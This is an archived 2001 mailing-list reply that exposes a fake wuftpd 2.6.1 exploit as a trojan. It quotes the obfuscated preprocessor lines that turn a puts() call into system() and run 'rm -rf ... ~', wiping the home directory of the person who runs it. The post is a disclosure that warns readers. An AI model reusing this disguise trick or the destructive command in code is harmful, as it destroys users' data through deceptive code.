Vulnerability Development mailing list archives

Re[2]: wuftpd 2.6.1 advisory/exploit

From: Alexander Ryumshin <mizi () alkar net>
Date: Thu, 20 Sep 2001 15:55:14 +0300

Hello,

Yes, the trick is here:

//#define POTS 12                       /* fill these in for your
#define DEF_ALGN 1                       * target system
//#define HEAP_ADDR 0x41414141           */
#define target (unsigned long)
unsigned long arg_addr = ADDR, align = DEF_ALGN,

After preprocessing the code looks like

unsigned long arg_addr = 0x08049588, align = 1 * (unsigned long) system;

Then puts' address is being replaced by system's or something like
that and then puts("rm -rf is not elite ~"); does the main trick :)
Hint: ~ means your home directory.

--
Best regards,
Alexander